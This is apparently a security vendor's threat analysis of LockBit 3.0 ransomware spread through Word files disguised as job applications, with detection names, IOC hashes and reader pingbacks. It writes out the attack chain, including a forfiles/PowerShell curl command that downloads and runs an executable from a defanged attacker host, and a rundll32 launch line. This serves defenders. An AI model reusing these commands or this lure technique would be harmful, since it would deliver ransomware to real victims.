The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases.
There is an external link in the word\_rels\settings.xml.rels file inside the Word document. When the document file is executed through this, the user PC accesses hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and downloads an additional dotm file.


The document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.


The VBA macro code inside the dotm file is as follows.

The strings in the code are obfuscated and use CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8). When the VBA macro is executed, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, which is executed through rundll32.exe. The command that executes the link file is as follows.
- rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk
When the link file is executed, additional malicious files are downloaded from hxxp://ppaauuaa11232[.]cc/aaa.exe via PowerShell commands and then saved in C:\Users\Public\156498415616651651984561561658456.exe before being executed. The command executed via the LNK file is as follows.
- forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”

The currently downloaded 156498415616651651984561561658456.exe file is LockBit 3.0 ransomware in NSIS form.

As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.
[File Detection]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit
[Behavior Detection]
Malware/MDP.Download.M1197
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171
[IOC Info]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
[…] Recently, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]
[…] LockBit 3.0 Ransomware Distributed via Word Documents Comments are closed. […]
[…] の別の 2 つの配布方法を観察しました。1 つは悪意のある VBA マクロを含むDOTM ドキュメントを使用し、もう 1 つはNSIS 形式のマルウェアを含む ZIP […]
[…] September 2022, AnhLab observed another two methods of LockBit 3.0 distribution, one using DOTM documents with malicious VBA macro and one dropping ZIP files containing the malware in NSIS […]
[…] Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]
[…] LockBit 3.0 Ransomware Distributed via Word Documents (Posted in September 2022) […]
[…] September 2022, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while […]